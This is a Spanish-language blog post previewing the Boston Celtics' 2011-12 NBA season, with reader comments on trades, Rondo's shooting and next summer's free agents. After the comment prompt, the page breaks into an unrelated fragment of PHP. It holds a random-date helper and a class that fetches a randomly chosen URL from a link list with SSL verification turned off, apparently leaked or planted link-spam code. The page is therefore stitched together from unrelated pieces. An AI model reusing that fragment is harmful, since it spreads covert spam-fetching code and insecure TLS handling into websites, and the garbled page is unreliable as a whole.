Boston Celtics: Tiempo de espera

09 de January de 2012 por Jabho

Doble o nada. Eso debió pensar hace unos meses Danny Ainge cuando se le presentó la posibilidad de mandar a Perkins y Nate Robinson a Oklahoma a cambio de Green y Krstic. Jeff Green era un paso hacía el futuro, mientras que en el presente daría un relevo de calidad en las alas y aportaría unas piernas jóvenes que falta hacían. Para que saliera bien “sólo” hacía falta que alguno de los O´Neal llegara lo suficientemente sano a playoffs como para jugar 25 minutos de calidad… y con eso luchar por el anillo otra vez.

Doble o nada. Hoy Krstic juega en el CSKA de Moscú, Shaq se ha retirado, a Jermaine ni está ni se le espera y Green ya veremos si vuelve a jugar a baloncesto tras sus problemas cardiacos, que como mínimo le tendrán fuera esta temporada entera. Salió cruz sin duda.

Y de aquellos polvos estos lodos. Los verdes se presentan a la temporada 2011-2012 con un roster un año más viejo, poco profundo y falto de talento más allá del “Big Four”.

Consciente de que con lo que hay no da para luchar por el título, durante las dos semanas que ha durado la corta preseason de este año Ainge ha intentado incorporar talento a la plantilla. Sonó con fuerza David West pero por encima del límite salarial y con poco que ofrecer en un sign&trade, fue imposible. Westbrook, Paul o incluso Howard sonaron, pero me temo que estos rumores fueron más deseo que realidad porque los Celtics, salvo Rondo, no tienen nada que ofrecer. Al final Ainge se conformó con mandar a Glen Davis a Orlando a cambio de Brandon Bass. El de Big Davis por Bass es sin duda un buen trade para Boston en muchos sentidos, pero que no nos va a sacar de pobres. Y reincorporar a Daniels y traer a Dooling, Pietrus, Wilcox o Pavlovic tampoco.

La dirección del equipo seguirá a manos de Glen “Doc” Rivers. La mejor noticia del año pasado para los célticos fue la renovación de Rivers por 5 años, que amenazaba con tomarse un año sabático. Para mi es uno de los mejores entrenadores de la liga tanto en estrategia como en motivación y gestión del equipo.

Al inicio de cada partido saltarán a la cancha Rajon Rondo, Ray Allen, Paul Pierce y Kevin Garnett. Han pasado los mejores años del otrora poderoso “Big Three” pero aun así es un cuarteto para amargarle la noche a cualquiera. Ray Allen y Kevin Garnett pasan por ser dos de los tipos que más se cuidan, lo que les ha permitido se productivos incluso pasados los 35. Ambos son jugadores muy completos y buenos complementos para cualquier equipo pero quedan lejos los días en que dominaban la liga. Paul Pierce sigue siendo el capitán, alma y referencia ofensiva de estos Celtics… pero también en la frontera de los 35. Rajon Rondo se ha consolidado como uno de los mejores bases de la competición, especialmente en defensa pero también en dirección, aunque su incapacidad para anotar desde fuera le limita a la hora convertirse en un jugador franquicia.

Junto a ellos saltará Jermaine O’Neal si está sano y cualquiera cuando no lo esté. Estas noches estamos viendo al trotamundos Greg Stiemsma que está cumpliendo, como cumplió Erden el año pasado, pero al que no se le puede pedir demasiado. Del banco saltarán los mencionados Brandon Bass, Marquis Daniels, Keyon Dooling, Michael Pietrus, Chris Wilcox y Sasha Pavlovic más el rookie JaJuan Johnson, y el sophmore Avery Bradley.

Pietrus, Wilcox- hubo un tiempo que parecía que sería un buen jugador- y Pavlovic no tienen nivel para estar en un equipo que aspire a ganar un anillo. Son jugadores residuales para minutos de la basura y poco más. Y Daniels es un correcto defensor que se pierde una media de 20 partidos por temporada y que no aporta prácticamente nada en ataque.

El rookie, por lo que vimos en la NCAA, podría aportar, en el futuro, tapones, rebotes y trabajo defensivo. Pero le falta tamaño para jugar de center y justo el puesto de alero poderoso es de lo poco que está bien cubierto en el banco. Y Bradley llego a la liga el año pasado y un año después sigue verde que te quiero verde. No es que haya perdido la esperanza en él, todavía, pero con lo necesitados que están los Celtics de relevos de calidad el chaval no se hace con un hueco en el equipo. De momento los minutos que juega se limita a defender con intensidad, que algo es algo.

Nos quedan Dooling y Bass. Brandon Bass será el 6º hombre y, dada la necesidad de energía en el frontcourt, contará con muchos minutos. Es un jugador limitado de condiciones, tanto técnicas como de tamaño, pero que elude complicarse la vida en ataque y que trabaja bien en defensa. Cumplirá sin duda igual o incluso mejor que Big Davis. La foto de Dooling aparece en el diccionario cuando buscas la definición de base suplente.

Y con estos bueyes tenemos que arar. Más allá del “Big Four” y la aportación de Dooling y Bass desde el banco, el equipo presenta dos graves déficits: por un lado hace falta como el comer un center que aporte tamaño, defensa y rebotes al equipo (¿quién ha dicho Perkins?), y por otro un alero que pueda anotar saliendo desde el banco. Con estos dos jugadores el equipo competiría por el anillo.

Y tiene muy difícil Ainge conseguir estos jugadores habida cuenta que como he dicho hay poco que aportar en un hipotético trade. Pero claro, la otra posibilidad es que Jermaine esté sano, sino todo el año al menos en el momento de la verdad, y que Bradley madure a marchas forzadas en los próximos meses… Complicado por decirlo suavemente.

Es tiempo de espera por tanto para los verdes. Aunque no creo que la espera sea larga. La situación salarial de los Celtics para el verano que viene es muy buena, ya que debería haber suficiente margen para contratar una gran estrella y renovar muy a la baja tanto a Garnett como a Allen. Hasta la fecha Ainge ha demostrado que es capaz de armar un equipo capaz de luchar por el anillo, por lo que es de esperar que el verano veamos más talento vestido de verde.

Confío por tanto que para el año que viene, o incluso este si Ainge consigue anticipar la reconstrucción del equipo cosa que no es improbable, el equipo será de nuevo aspirante al título de la mano de Rivers, el Big Four y quien sabe quién más.Mientras tanto los Celtics seguirán ofreciendo defensa, pelea y talento. Ya se sabe, orgullo céltico. Quién espere una perita en dulce en los Playoffs que busque en otra parte.

Quinteto: Rajon Rondo, Ray Allen, Paul Pierce, Kevin Garnett y Jermaine O´Neal
6º Hombre: Brandon Bass

Pronóstico: 3º de la conferencia. 2ª ronda de Playoffs.

Comenta

30 comentarios a esta entrada

  1. nach dice:
    #1

    Año de transición. Los aficionados de los Celtics esperaremos con ansia al próximo verano, en donde se puede pescar lo que hace falta para aspirar al anillo de nuevo, se necesita un 5, que es lo que se buscará supongo, toda vez que los únicos con contrato son Rondo,Pierce,Bradley y Johnson, aparte de la opción de jugador de Bass, y espero que renueven a la baja tanto a Allen como a Garnett, los cuales no creo que vayan a poner ningún tipo de problema en bajarse el salario de forma considerable para poder aspirar a un contrato multianual y estar en disposición de aspirar a ganar otro anillo, pongamos que alrededor de 10 kilos por los 2, con lo cual se tendrían “hipotecados” 40 millones para la temporada siguiente, lo que daría suficiente espacio para aspirar a conseguir a algún agente libre muy jugoso para las posiciones débiles o incluso hacer algún traspaso absorviendo algún contrato venenoso. Y eso que se consiga a sumar al núcle Rondo-Allen-Pierce-Garnett. Casi nada.

      Citar

  2. Pop dice:
    #2

    Están ya claramente en cuesta abajo, pero yo no me fiaría ni un pelo si me enfrentara con ellos. Ahí hay gente que ha peleado en guerras de verdad y ha salido victorioso.

    Son el típico equipo que si bien no gana el campeonato, puede hacer que otros lo pierdan. Y como bien dice Jahbo, ojo en playoffs, cuanto más cerca vayan estando de las finales mejor se pueden manejar.

      Citar

  3. RSB dice:
    #3

    A mí siempre me pareció que el traspaso de Perkins fue un despropósito. Ojo, no lo dijo con un oportunismo cruel por la desgracia de Green, lo digo pensando en un Green al 100%, el año pasado ya se pudo observar claramente quien ganó y quien no en el traspaso y que los Thunder dieron un paso claro adelante.

    Green es mejor jugador y con más proyección, pero Perkins es un 5 al uso, algo de lo que nunca te puedes desprender en una liga que paga lo que paga a Dalembert, K. Brown, Chandler y cía. Oro puro, mala mercancía para intercambiar (y mira que este año me está decepcionando un poco), y mala idea también tocar algo que funciona.

    No los veo terceros de conferencia, pero sí peleando por llegar a las semis. Rondo había empezado como un tiro

      Citar

  4. melo15 dice:
    #4

    lo de perkins fue una cafada se mire donde se mire, ademas green es un jugador en plan Thaddeus Young que no son tan rapidos para ser aleros ni tienen quilos para ser aña-pivots, yo renovaria a Garnett y a Allen por 2 o 3 cada uno.

      Citar

  5. rumbero dice:
    #5

    Excelente análisis. Me parece más que acertado el titular “Tiempo de espera”. Aun así son los Celtics…y con el Big Four sano (aunque un año más viejo) van a ser un hueso en play offs. Lástima que O’Neal sea un ex-jugador de baloncesto…
    Contra Miami lo tendrán muy crudo (y quien no) pero no tanto contra el resto de equipos del Este. Igual los Bulls podrían con ellos, pero con Rondo encima de Rose y con Rivers sacándose algun as de la manga habría que verlo. Con ganas de que llegue el verano que viene para ver como se mueven.

      Citar

  6. nach dice:
    #6

    melo15:
    lo de perkins fue una cafada se mire donde se mire, ademas green es un jugador en plan Thaddeus Young que no son tan rapidos para ser aleros ni tienen quilos para ser aña-pivots, yo renovaria a Garnett y a Allen por 2 o 3 cada uno.

    2-3 kilos no creo que te acepten, aunque por dinero no va a ser, no creo que tengan problemas de eso, ahora, por 4-5 por cabeza si que lo veo, porque todavía son jugadores más que válidos, serían titulares en mitad de los equipos de la liga…

    rumbero:
    Excelente análisis. Me parece más que acertado el titular “Tiempo de espera”. Aun así son los Celtics…y con el Big Four sano (aunque un año más viejo) van a ser un hueso en play offs. Lástima que O’Neal sea un ex-jugador de baloncesto…
    Contra Miami lo tendrán muy crudo (y quien no) pero no tanto contra el resto de equipos del Este. Igual los Bulls podrían con ellos, pero con Rondo encima de Rose y con Rivers sacándose algun as de la manga habría que verlo. Con ganas de que llegue el verano que viene para ver como se mueven.

    En verano no se que esperar, lo ideal sería Howard pero es un sueño imposible, aunque pensar en el hueso que podría ser para los rivales un equipo con Rondo, Garnett y Howard en el quintento…serían candidatos nº1 al anillo la temporada siguiente indiscutiblemente.

      Citar

  7. German dice:
    #7

    Coincido con RSB en cuanto al traspaso de Perkins. Incluso Nate Robinson me parece mejor base suplente que lo que tienen ahora.
    Si renuevan por poco a KG y Allen, me atrevo a soñar con Howard fichando como agente libre. Seria un equipazo.

      Citar

  8. rumbero dice:
    #8

    German:
    Si renuevan por poco a KG y Allen, me atrevo a soñar con Howard fichando como agente libre. Seria un equipazo.

    Sería EL equipazo. Menudo sueño húmedo…Encima Paul a los Clippers y Howard a los Celtics….a los de púrpura les da algo xD

      Citar

  9. Esteban dice:
    #9

    creo que las cuentas dan ñperfecto para que vayan por howard y tener SI un super 5 titular, de los mejores de la historia con 5 all-star en cancha, pero no se por q howard nisiquiera considera una alternativa boston, lo mismo hizo cp3, q aclaro q no jugaria en boston,

    les pregunto ya que peco de ignorane, boston no es una plaza atrayente para agentes lbres?

      Citar

  10. portu dice:
    #10

    No sé si el año q viene un equipo aspirante puede tener 3 jugadores titulares de tanta edad, ya no digo este año, q está claro q faltan piezas con calidad. Pero tampoco nadie creía el año pasado en los Mavs y sonó la flauta, tb podría ocurrir con los Spurs, un caso parecido en cuanto a talento viejuno, je,je,… pero más allá de plantarles cara a los Heat o a los Bulls en una eliminatoria a cara de perro, no veo capaces a los Celtics de salir victoriosos de todas las eliminatorias q hay q superar para ser campeones o incluso para llegar a la final de conferencia. Y las soluciones tampoco las veo, antiguamente lo único q hacía bien Ainge de GM era pescar buenos jugadores en el draft con puestos no demasiado buenos, ahora parece q no es capaz de sacar ni siquiera un jugador de complemento. Tampoco los FA han sido para dar palmas precisamente… Pavlovic??? pero dónde vamos con este tío? y otra vez Marquis Daniels? Viendo como está el equipo creo q hubiese sido mejor apostar tanto en el draft como en los FA por algún jugador joven con margen de progresión aunque estuviese por pulir… ahora por ejemplo acaban de regalar los Sixers a M. Speights… casos así suele haber algunos y parece q Ainge prefiero apostar por malo y viejo conocido…
    En definitiva, q soy muy poco optimista y creo q el declibe lógico se puede acentuar este año incluso cayendo en 1era ronda.

      Citar

  11. portu dice:
    #11

    Declive con v, sorry.

      Citar

  12. nach dice:
    #12

    Esteban:
    creo que las cuentas dan ñperfecto para que vayan por howard y tener SI un super 5 titular, de los mejores de la historia con 5 all-star en cancha, pero no se por q howard nisiquiera considera una alternativa boston, lo mismo hizo cp3, q aclaro q no jugaria en boston,

    les pregunto ya que peco de ignorane, boston no es una plaza atrayente para agentes lbres?

    Un agente libre que vaya a Boston tiene ciertas “limitaciones” que uno que vaya a otro equipo:
    1) El equipo es, desde los Spurs, la franquicia que más juega en equipo de la NBA, lo cual hace que un jugador vaya a tener que renunciar en cierta parte a sus cifras para encajar en el mismo, nada de pelarse 20 tiros por noche.
    2) No va a ser la referencia nº1 en ataque, ni siquiera probablemente la nº2, porque eso no existe en Boston más allá de los segundos finales de partido y Pierce o Allen
    3) El nivel de exigencia es muy alto.

      Citar

  13. melo15 dice:
    #13

    Si pero tambien tiene cosas muy buenas, como la ciudad que es muy bonita, la historia de ka franquicia…

      Citar

  14. wind_bird dice:
    #14

    Creo que Boston ha perdido una gran oportunidad otra vez este verano… y no, no me refiero a fichar a Paul… o cualquiero otro que os pase por la cabeza.
    Han perdido la ocasión de fichar a un Rose mejorado… Como es eso?… Tienen en su plantilla un jugador que se llama Rondo, que podría ser uno de los mejores jugadores de la liga, que necesita trabajar un verano entero su tiro exterior… y no lo hace… Esta es la oportunidad que ha perdido, este debería haber sido el objetivo de la franquicia…
    Con Rondo siendo el jugador que debiera ser (ojo que Rubio tome nota) este equipo parecería otro. Rondo haría facil un 25-10, crearía un montón de problemas a las defensas y sus compañeros vivirían infinitamente mejor… todos… y sobre todo los mas veteranos.

      Citar

  15. TheDeerHunter dice:
    #15

    ¿Porqué dices que no lo hace Wind??
    Rondo sí ha trabajado su tiro este verano. Es público y notorio.
    No he seguido los Celtics tanto como seguro lo has hecho tú, pero yo sí he observado ciertas mejoras en ese sentido.
    El trabajo se ha hecho, como estoy seguro que también lo ha hecho Ricky. Otra cosa son los efectos reales, que obviamente cuestan de salir… que se lo digan a Jason Kidd.

      Citar

  16. nach dice:
    #16

    Mejorar ha mejorado, eso me parece innegable, pero su punto flaco siguen siendo los tiros libres. Es inadmisible que un base NBA tenga un 60% o menos de acierto desde la línea de tiro libre, y eso es simplemente cuestión de entrenamiento.

      Citar

  17. TheDeerHunter dice:
    #17

    No es tan problemático lo de los tiros libres en un base como en un interior. Estamos hablando que el año pasado lanzaba de promedio 2!! Al menos este año sube a más de 5 y eso es bueno.
    Yo creo que Rondo, por sus características, no necesita tanto lanzar bien los tiros libres que lanzar cuando tiene que lanzar. Y, de momento este año casi ha duplicado sus promedios de acierto desde el exterior!!!
    En cualquier caso admito que es un aspecto que debe mejorar y yo creo sinceramente que este año vamos a ver ciertos progresos.

      Citar

  18. nach dice:
    #18

    Pues para mí teniendo en cuenta el tipo de juego de Rondo cuando tiene que anotar, saber tirar tiros libres me parece fundamental para alguien que basa su anotación en gran parte en penetraciones

      Citar

  19. TheDeerHunter dice:
    #19

    No discuto que en gran parte llevas razón, pero el impacto de los tiros libres es el que te he dicho antes. Desconozco cual es el motivo que lance tan poco.
    De todas formas si mejora el tiro a media larga distancia eso de que “basa su anotación en penetraciones” quedaría minimizado.

    Por cierto, que Rondo llegó a la liga como un gran lanzador de tiros libres y de repente algo sucedió. Lo digo por eso de que sea “simplemente cuestión de entrenamiento”. Hay muchos aspectos del baloncesto que son una cuestión psicológica más que otra coas… y este es uno de ellos. No lo veo tan sencillo de corregir.

      Citar

  20. nach dice:
    #20

    Pues lo de los tiros libres si que es un misterio, no creo que se olvidara de como se tiran xD

    Sisi, claro que si mejora su tiro de media y larga distancia, no abusará tanto de penetraciones, es decir, para ser el mejor base de la NBA con mejorar ese tiro de media distancia y larga distnacia le será suficiente, con tal de conseguir porcentajes aceptables desde el triple ya será el nº1 para su posición a mi forma de ver.

      Citar

  21. Pop dice:
    #21

    No tengo tan claro eso de que la mejora en los tiros libres sea “simplemente” una cuestión de entrenamiento. El % de acierto en tiros libres es de lo más constante en la carrera deportiva de los jugadores, salvo contadas excepciones. Se notan mucho más progresiones en cualquier otra clase de tiro.

      Citar

  22. nach dice:
    #22

    Se pueden mejorar hasta un punto, es decir, si eres Shaq no vas a ser capaz de tirar con un 80% de acierto, está clarísimo, pero si que puedes mejorar igual bastante.

    Por poner un ejemplo, Calderón entre la 06-07 y la 07-08 pasó de un 33% en triples a un 42%, y también de un 81% en tiros libres a un 90%, es lo que muchas veces se le echó en cara a Shaq, que podía haber mejorado mucho, igual nunca habría tirado un 80%, puede que ni siquiera un 70%, pero no tendría una media del 52% como tuvo a lo largo de su carrera.

      Citar

  23. Nacho dice:
    #23

    No ha lugar. No ha lugar. Repito y podré repetir mil veces. No ha lugar.
    Se podrá discutir el impacto de los tiros (libres y exteriores) de Rondo. Su mejora (que por cierto, es palmaria este año), su oportunidad, etc…, pero discutir, juego y profesionalidad, como hace wind_bird, de un tipo como Rondo, pues eso, que no ha lugar.
    Preguntémonos gracias a quien se sustentan este año los verdes, y saldrán los nombres de Rondo y de Allen. Que cada uno tenga su base preferido es obvio (el mío es Rondo), que cada uno tenga cosas que mejorar, también, pero ¡coño!, seamos serios, su juego y profesionalidad debe estar fuera de toda duda.
    Y por cierto, Rondo pega mucho mejor en este equipo que Rose. Por mucho que a la mayoría le guste más el de los Bulls. Y razones hay muchas. Las iremos dando.
    P.D. No ha lugar.

      Citar

  24. Jabho dice:
    #24

    portu:
    No sé si el año q viene un equipo aspirante puede tener 3 jugadores titulares de tanta edad, ya no digo este año, q está claro q faltan piezas con calidad. Pero tampoco nadie creía el año pasado en los Mavs y sonó la flauta, tb podría ocurrir con los Spurs, un caso parecido en cuanto a talento viejuno, je,je,… pero más allá de plantarles cara a los Heat o a los Bulls en una eliminatoria a cara de perro, no veo capaces a los Celtics de salir victoriosos de todas las eliminatorias q hay q superar para ser campeones o incluso para llegar a la final de conferencia. Y las soluciones tampoco las veo, antiguamente lo único q hacía bien Ainge de GM era pescar buenos jugadores en el draft con puestos no demasiado buenos, ahora parece q no es capaz de sacar ni siquiera un jugador de complemento. Tampoco los FA han sido para dar palmas precisamente… Pavlovic??? pero dónde vamos con este tío? y otra vez Marquis Daniels? Viendo como está el equipo creo q hubiese sido mejor apostar tanto en el draft como en los FA por algún jugador joven con margen de progresión aunque estuviese por pulir… ahora por ejemplo acaban de regalar los Sixers a M. Speights… casos así suele haber algunos y parece q Ainge prefiero apostar por malo y viejo conocido…
    En definitiva, q soy muy poco optimista y creo q el declibe lógico se puede acentuar este año incluso cayendo en 1era ronda.

    Portu,

    Creo que con Ainge no tienes razón. Mirando con perspectiva sus decisiones hay, de largo, muchos más aciertos que errores. Los trades que trajeron a Ray Allen y KG a Boston pot un pick 5 y AL Jeff que aun no ha jugado un All Star han sido un tremendo acierto. Pillar a Big Davis con un pick 35, o Rondo con un pick en torno a 20 en un draft malo. La propia renovación de Rondo….

    En cuanto a los jugadores viejos, PJ Brown, Sheed o Cassel dieron buen resultado. Los O´neal no por lesiones, que es algo esperable en Shaq por edad y en Maine porque era su tónica los últimos años.

    Ainge remodeló un equipo que en un ciclo de 4 años ha ganado un anillo, jugado una final y 2 finales de conferencia… y si no se hubiera lesionado Garnett quien sabe. Pero lo mejor es que tras este ciclo el equipo puede renovarse ya que no está atado a malos contratos.

    El año que viene habrá muchas opciones. Howard es un sueño húmedo, pero es que no hace falta tanto para volver a competir. En lo único que coincido es que para competir por el anillo el peso no debe llevarlo el Big Three.

    A mi personalmente la gestión de Ainge y este ciclo de 4-5 años me ha merecido la pena y no veo a nadie mejor para volver a reconstruir el equipo. Me parece uno de los mejores GMs de la NBA

      Citar

  25. GreenPride dice:
    #25

    Gran análisis del que como ya todos imagináis es mi equipo en la NBA.
    Creo que a los orgullosos verdes les falta algo este año para poder llegar a ser unos verdaderos aspirantes nº1 por el anillo. El 5 titular con O’Neal sano sería para luchar con cualquiera pero con los años que tienen los del Big Three haría falta unos relevos de verdaderas garantías que les dejaran descansar bastantes minutos y estar frescos para las partes finales de los partidos y esto no parece que pueda hacerlo un banquillo Dooling, Pietrus, Daniels, Bass, Stiemsma. Eso sí, como muchos han dicho no sería yo el que desearía jugarme una eliminatoria de playoffs contra estos Celtics si llegan todos sanos a los playoffs. Dicho esto en el Este sólo veo a Miami claramente por encima y creo que los Bulls aunque terminarán claramente delante en la regular, podrían sufrir mucho en unas series contra los de Boston.
    En cuanto a Rondo, para mí ha mejorado claramente en el lanzamiento exterior y de libres este verano y es sin duda un base de los mejores de la liga. Si realmente acaba de mejorar su lanzamiento será el jugador franquicia de los Celtics para los próximos años.
    Para el año que viene, ¿Que tendrá preparado Ainge? Está claro que se queda mucho espacio salarial libre. Creo que el plan inicial es apostar todo por Howard y convenciéndolo de que Garnett y Allen se quedarían bajando bastante sus contratos. No parece que vaya a ser suficiente para conseguirlo pero si no es él los verdes deberían pescar algún agente libre de verdadera calidad o dos y luego intentar renovar a la baja a Garnett y Allen y estarían probablemente preparados para un último intento de uno o dos años por el título. La otra opción es dejarles marchar e ir ya descaradamente a conseguir un equipo más joven pero no parece que haya suficientes agentes libres de calidad el verano que viene para ello.
    Mientras tanto y si Ainge no lo remedia, creo que caeremos con orgullo en segunda ronda de playoffs o finales de conferencia dando guerra si las lesiones no lo impiden

      Citar

  26. nach dice:
    #26

    Para mí el año que viene Garnett y Allen renuevan bajando salario independientemente de si se traen a alguien más, son 2 piezas fundamentales para convencer a cualquier agente libre, que sabe que de ir a Boston, va a ser instantáneamente candidato al anillo.

    La estrategia está clara, es conseguir un 5 y algo de refuerzo exterior, a día de hoy viendo los agentes libres hay alguno interesante:

    Hinrich
    Diaw
    Ben Wallace
    Dragic
    Posey
    Hibbert (Restringido)
    Kaman
    Billups
    Howard
    Nocioni
    Carter
    Camby
    Okur

    De ahí se puede sacar algún 5 bastante interesante (Kaman) y aún así tener margen para conseguir rotación exterior (Hinrich,Carter,Diaw), y si no siempre hay opciones de conseguir otro pivot de menor nivel aunque interesante como Okur,Wallace o incluso intentarlo con Hibbert, aunque este es restringido

      Citar

  27. wind_bird dice:
    #27

    Si, Rondo ha mejorado algo…la pregunta es, ha trabajado al nivel de lo que tiene que mejorar?
    Rondo es un gran profesional?, porque?, porque juega muy bien al baloncesto y muerde en cada balón?… alguien se acuerda de lo que pasó con la selección?…
    Habeis leido su “trabajo” este verano?…
    El tiro es una cuestión de trabajo, en un porcentaje muy alto… y no hay excusas con O´Neal y compañía… leer a sus entrenadores… a los personales, a los que se dedicaron a intentar cambiar viejos habitos… leerlos una vez dejaron de trabajar con estos jugadores.
    Hay cosas que se tienen o no… como Rondo tiene visión, instinto, condiciones atleticas… pero el tiro?… es cuestión de horas y horas… que se lo digan a Petrovic.
    Rondo se va a quedar a medio camino de ser un grandisimo base por falta de trabajo… y en temporada es mas dificil sacar tiempo para hacerlo… aunque como digo Drazen lo hubiera sacado…

      Citar

  28. nach dice:
    #28

    El tema del tiro no es tan simple. Es decir, lo puedes mejorar hasta cierto punto, no es ponerse a tirar y venga, de ser así cualquiera podría ser Stojakovic, hay hasta un punto que se puede mejorar entrenando, corrigiendo errores, posición y demás, pero hay límites que no vas a poder superar.

    O’Neal fue un mal profesional, pero al mismo tiempo uno de los grandes por unas condiciones y un talento natural tremendo, porque muchas veces no cuidaba su peso por ejemplo, pero al mismo tiempo el tiro libre yo si creo que lo entrenó, cambió la mecánica al llegar a cierto punto, pero no obtuvo resultados llamativos ¿por qué? llámalo tener las manos demasiado grandes, llámalo falta de concentración para tirar, llámalo mala mecánica….

    No es casualidad que los jugadores normalmente mejoren en el tema del tiro, pero por muchas razones, no únicamente es mejorar la mecánica, igual mejoras la selección, etc…

      Citar

  29. Blade Petrovic dice:
    #29

    Pero como decia Shaq yo solo meto los importantes los demas para qe ?

      Citar

  30. portu dice:
    #30

    Jabho: Portu,Creo que con Ainge no tienes razón. Mirando con perspectiva sus decisiones hay, de largo, muchos más aciertos que errores. Los trades que trajeron a Ray Allen y KG a Boston pot un pick 5 y AL Jeff que aun no ha jugado un All Star han sido un tremendo acierto. Pillar a Big Davis con un pick 35, o Rondo con un pick en torno a 20 en un draft malo. La propia renovación de Rondo….En cuanto a los jugadores viejos, PJ Brown, Sheed o Cassel dieron buen resultado. Los O´neal no por lesiones, que es algo esperable en Shaq por edad y en Maine porque era su tónica los últimos años.Ainge remodeló un equipo que en un ciclo de 4 años ha ganado un anillo, jugado una final y 2 finales de conferencia… y si no se hubiera lesionado Garnett quien sabe. Pero lo mejor es que tras este ciclo el equipo puede renovarse ya que no está atado a malos contratos.El año que viene habrá muchas opciones. Howard es un sueño húmedo, pero es que no hace falta tanto para volver a competir. En lo único que coincido es que para competir por el anillo el peso no debe llevarlo el Big Three.A mi personalmente la gestión de Ainge y este ciclo de 4-5 años me ha merecido la pena y no veo a nadie mejor para volver a reconstruir el equipo. Me parece uno de los mejores GMs de la NBA

    Bueno, Ainge ha tenido sus fases… hubo una época en la q teníamos a Blount-Lafrentz de pivots titulares y no hace mucho tiempo, con Ricky Davis de compañero por fuera de Pierce, todo eso tras más q dudosos intercambios… y en esa época yo le defiendo por sus buenas elecciones en el draft… McCants parecía un buen jugador, K. Perkins acabó siendo un buen jugador, Al Jefferson era una apuesta arriesgada, venía de High school directamente si no recuerdo mal, la misma apuesta salió mal con G. Green, Rondo fue un robo bestial y G. Davis, pues bueno, no voy a mirar ese draft, pero tampoco es un jugador brillante ni mucho menos, entra ya en el grupo de jugadores q no tienen demasiado márgen de progresión, puede complementar, aportar algo más, pero para titular de un equipo de playoffs no.
    Conseguir el Big three fue un triunfazo, entregó a Al Jefferson q ya era un gran jugador y un pick alto, las circunstancias eran las idóneas, pero había q arriesgar todo el futuro y salió bien… gran acierto de Ainge. Pero lo q yo le critico ahora es q a esos jugadores los ha rodeado de complementos q son muy veteranos y conocidos, no ha arriesgado nunca… incluso en el draft ha pillado jugadores como A. Bradley q venían con fama de ya formados, buenos en defensa… es decir, no ha arriesgado buscando un robo, un posible sustituto de los cracks aunque luego sea un pufo… en esa línea de mediocridad van los fichajes de Pavlovic, Jermaine O´Neal q ya se veía q iba a ser un fiasco (pero salió medio bien lo de R. Wallace y tenía crédito), Marquis Daniels… y cagada tb lo de J. GreenxK. Perkins, rompió la química y la estructura del equipo en muy mal momento y tampoco había demostrado tanto Green como para ir a por él, ni sería un gran sustituto de KG ni lo sería de Pierce, como mucho un buen 6º hombre, pero nos dejaba fatal en la posicion de 5.
    Poniendo todas sus decisiones en la balanza creo q Ainge sale bien parado por las ilusión de competir el título durante varios años y por haber ganado un campeonato, pero habrá q criticarle lo q es criticable, no?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>